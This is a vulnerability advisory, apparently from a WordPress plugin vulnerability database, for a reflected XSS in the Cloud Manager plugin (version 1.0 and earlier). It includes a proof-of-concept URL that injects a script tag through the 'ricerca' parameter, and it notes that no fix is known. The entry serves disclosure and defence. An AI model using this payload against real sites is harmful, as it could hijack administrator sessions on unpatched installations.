WordPress Plugin Vulnerabilities

Cloud Manager <= 1.0 - Reflected XSS

Description

The plugin does not sanitise and escape the query param ricerca before outputting it in an admin panel, allowing unauthenticated attackers to trick a logged in admin to trigger a XSS payload by clicking a link.

Proof of Concept

http://example.com/wp-admin/admin.php?page=cloud-gestione-files&ricerca=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Shreya Pohekar
Submitter
Shreya Pohekar
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-04-12 (about 1 years ago)
Added
2023-04-12 (about 1 years ago)
Last Updated
2023-04-12 (about 1 years ago)

Other